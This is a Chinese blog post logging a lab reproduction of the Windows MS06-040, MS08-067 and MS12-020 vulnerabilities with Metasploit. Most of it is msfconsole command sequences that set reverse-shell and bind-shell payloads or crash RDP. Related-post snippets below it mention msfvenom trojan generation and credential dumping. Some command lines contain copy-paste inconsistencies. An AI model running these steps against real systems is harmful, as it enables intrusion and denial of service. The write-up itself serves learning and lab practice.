msf学习之旅

最新推荐文章于 2022-10-20 14:07:33 发布
最新推荐文章于 2022-10-20 14:07:33 发布
阅读量919 收藏 12
点赞数 1
分类专栏: ubuntu 安全 文章标签: msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334464/article/details/83957795
版权 
从八月份到十一月份,从Antiy到新单位,现在算是正式落下脚。开始研究一些新的东西。上周正好有点时间,就在本地复现了三个msf系列的漏洞。做了相关记录,分享出来,网上也有相关文章,可以学习参考。

Microsoft Windows Server服务远程缓冲区溢出漏洞(MS06-040)

#msfconsole

msf > search ms06-040

msf > use exploit/windows/smb/ms06_040_netapi

msf exploit(ms06_040_netapi) > set RHOST 192.168.1*1.1**

RHOST => 192.168.1*1.1**

msf exploit(ms06_040_netapi) > set PAYLOAD windows/shell_bind_tcp

PAYLOAD => windows/shell_bind_tcp

msf exploit(ms06_040_netapi) > set LPORT 2222

LPORT => 2222

msf exploit(ms06_040_netapi) > show targets

msf exploit(ms06_040_netapi) > set target 2

msf exploit(ms06_040_netapi) > show options

msf exploit(ms06_040_netapi) > exploit

Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)

#msfconsole

msf > search ms08-067

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms06_040_netapi) > set payload windows/meterpreter/reverse_tcp

PAYLOAD => windows/shell_bind_tcp

msf exploit(ms08_067_netapi) > set RHOST 192.168.1*1.1**

RHOST => 192.168.1*1.1**

msf exploit(ms08_067_netapi) > set LHOST 192.168.1*1.1**

RHOST => 192.168.1*1.1**

msf exploit(ms06_040_netapi) > show targets

msf exploit(ms06_040_netapi) > set target 2

msf exploit(ms06_040_netapi) > show options

msf exploit(ms06_040_netapi) > exploit

Microsoft windows远程桌面协议RDP远程代码执行漏洞(MS12-020)

#msfconsole

msf > search ms12-020

msf exploit(windows/smb/ms08_067_netapi) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RHOST 192.168.2*7.1**

RHOST => 192.168.2*7.1**

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set LHOST 192.168.2*7.1**

LHOST => 192.168.2*7.1**

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit

攻击结果:

[+]192.168.27.1**:3389 - 192.168.27.1**:3389 seems down

慎用,导致蓝屏

所有攻击步骤均在虚拟机模拟环境情况下进行,请勿用作非法用途。

附:靶机镜像xp地址<链接:https://pan.baidu.com/s/1YzlDrW1ZltSyuYKGX8j58Q 提取码:3cxq >

12306Br0
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF学习
willow_liang的博客
12-03 1588
目录 Metasploit模块 主机扫描 查找扫描模块 使用扫描模块 使用nmap扫描 搜索和使用samba的漏洞利用模块 后渗透攻击:信息收集 使用ms17-010对win7进行渗透 进程迁移 查看系统信息 截图 文件系统命令 权限提升 将meterpreter转换为后台执行 令牌窃取 hash攻击 或者上传pwdump,wce工具获取hash 使用mimikatz抓取密码 后渗透攻击:后门 1.Cymothoa后门 2.Persistence后门 3.w.
MSF学习笔记(10)
Shadow 爬爬记
12-11 692
宏代码生成root@kali root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe 利用session 扩大战果 生成后门s
MSF学习笔记
mohanhan
06-24 353
使用MSF生成木马_入侵win7 1 生成木马 先通过kali自带功能生成一个木马(123.exe) -f 输出格式 -o 输出地址 生成木马一般需要点时间 2 启动msf msfconsole 然后进行设置攻击参数&&启动攻击 3 让123.exe在目标机器执行 模拟黑客或是社工手法(这里方法多种多样),让木马文件123.exe在目标win7上运行 4 查看监听回显数据 木马已经运行了,现在返回msf 查看,发现建立了一条会话,查看下windows系统信息 5 后续操作 截取
MSF学习笔记(11)
Shadow 爬爬记
02-12 925
本地提权漏洞检测 meterpreter &gt; run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) &gt; set AutoRunScript migrate -n explorer.exe msf ...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
无人驾驶算法学习:多传感器融合MSF算法
01-28
无人驾驶技术在近年来得到了快速发展,其中多传感器融合(MSF)算法是实现高精度定位和导航的关键技术之一。本文主要探讨了基于误差状态的卡尔曼滤波(EKF)的MSF算法,特别是在相机和惯性测量单元(IMU)融合方面的...
Metasploit(MSF)基础超级详细版
懂进攻知防守
08-02 1万+
The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。 metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。 ............
msf学习笔记(2)
Shadow 爬爬记
11-02 518
exploit分类Active exploit示例:msf > use exploit/windows/smb/psexec msf exploit(psexec) > set rhost 192.168.1.100 rhost => 192.168.1.100 msf exploit(psexec) > set payload windows/shell/reverse_tcp payload =
生命在于学习——MSF初体验(一)
易水哲的博客
10-20 2889
Metasploit初体验(一)
msf使用
温和的跳跃
01-17 273
这个还是要学学,我感觉还可以。工具学学bp sqlmap namp msf应该差不多可以了。这个比其他的几个复杂一些。这篇文章马上安排上
MSF基础--set/unset
Ethan024的博客
07-03 663
使用set命令对参数进行设置: target为目标操作系统的类型: show options查询必填项:
4.2 metasploit 开发 exploit
qq_55202378的博客
08-25 751
msf exploit
msf永恒之蓝漏洞复现及问题解决
weixin_53253733的博客
02-12 6898
IP kali:192.168100.101 Windows7:192.168.100.91 Windows系统需要关闭防火墙,尤其是公用网络设置应该关闭 开始 1,查找永恒之蓝漏洞 search ms17_010 show options:展现需要设置的模块 使用漏洞 注:RHOST:靶机IP地址,即为Windows7的IP地址,set RHOST 192.168.100.91 RPORT:靶机端口号, 默认445端口,不必设置 LHOST:攻击机I...
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
Metasploit framework(二)——MSF基础构架及控制台命令详解
Jeromeyoung
03-24 2461
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 Metasploit Framework: 下载地址:https://www.rapid7.com...
msf 渗透工具学习材料
最新发布
08-20
学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值